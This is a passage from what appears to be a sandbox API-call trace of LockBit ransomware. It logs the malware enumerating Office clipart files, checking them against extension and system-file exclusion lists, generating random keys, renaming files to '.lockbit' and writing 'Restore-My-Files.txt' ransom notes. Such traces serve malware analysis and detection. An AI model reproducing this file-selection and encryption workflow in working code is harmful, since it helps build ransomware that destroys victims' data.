Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.025] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56452630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x11e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152716.WMF", cAlternateFileName="")) returned 1 [0146.025] lstrcmpiW (lpString1=".", lpString2="J0152716.WMF") returned -1 [0146.025] lstrcmpiW (lpString1="..", lpString2="J0152716.WMF") returned -1 [0146.025] PathFindExtensionW (pszPath="J0152716.WMF") returned=".WMF" [0146.025] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.025] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.025] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.025] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.025] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.025] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.025] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.025] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.025] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.025] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.025] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.025] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.025] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.026] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.026] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.027] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.027] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.027] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.027] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.027] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.027] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.027] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.027] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.027] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152716.WMF") returned 1 [0146.027] lstrcmpiW (lpString1="ntldr", lpString2="J0152716.WMF") returned 1 [0146.027] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152716.WMF") returned 1 [0146.027] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152716.WMF") returned -1 [0146.027] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152716.WMF") returned -1 [0146.027] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152716.WMF") returned 1 [0146.027] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152716.WMF") returned -1 [0146.027] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.027] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned=".WMF" [0146.027] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.027] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.027] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.027] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.027] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.027] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.027] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.028] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.028] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF.lockbit") returned 72 [0146.028] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0146.029] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.029] malloc (_Size=0x40068) returned 0x3d70450 [0146.029] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=4580) returned 1 [0146.029] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0146.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.031] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0146.031] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0146.103] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.103] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.103] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0146.104] free (_Block=0x1fa2ed8) [0146.104] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.104] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.104] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.104] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1b6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152722.WMF", cAlternateFileName="")) returned 1 [0146.104] lstrcmpiW (lpString1=".", lpString2="J0152722.WMF") returned -1 [0146.104] lstrcmpiW (lpString1="..", lpString2="J0152722.WMF") returned -1 [0146.104] PathFindExtensionW (pszPath="J0152722.WMF") returned=".WMF" [0146.104] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.104] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.104] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.104] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.104] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.104] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.104] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.104] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.105] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.105] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152722.WMF") returned 1 [0146.106] lstrcmpiW (lpString1="ntldr", lpString2="J0152722.WMF") returned 1 [0146.106] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152722.WMF") returned 1 [0146.106] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152722.WMF") returned -1 [0146.106] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152722.WMF") returned -1 [0146.106] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152722.WMF") returned 1 [0146.106] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152722.WMF") returned -1 [0146.106] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.106] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF") returned=".WMF" [0146.106] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.106] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.106] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.107] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.107] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF.lockbit") returned 72 [0146.107] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152722.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0146.108] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.108] malloc (_Size=0x40068) returned 0x3df0008 [0146.108] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7020) returned 1 [0146.108] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.109] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0146.109] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.109] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0146.109] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.111] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.111] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.111] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.112] free (_Block=0x1fa2ed8) [0146.112] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.112] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.112] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.112] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1ec4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152876.WMF", cAlternateFileName="")) returned 1 [0146.112] lstrcmpiW (lpString1=".", lpString2="J0152876.WMF") returned -1 [0146.112] lstrcmpiW (lpString1="..", lpString2="J0152876.WMF") returned -1 [0146.112] PathFindExtensionW (pszPath="J0152876.WMF") returned=".WMF" [0146.112] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.112] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.112] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.113] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.113] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152876.WMF") returned 1 [0146.114] lstrcmpiW (lpString1="ntldr", lpString2="J0152876.WMF") returned 1 [0146.114] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152876.WMF") returned 1 [0146.114] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152876.WMF") returned -1 [0146.114] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152876.WMF") returned -1 [0146.114] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152876.WMF") returned 1 [0146.114] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152876.WMF") returned -1 [0146.114] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.114] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF") returned=".WMF" [0146.114] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.114] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.114] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".mdf", 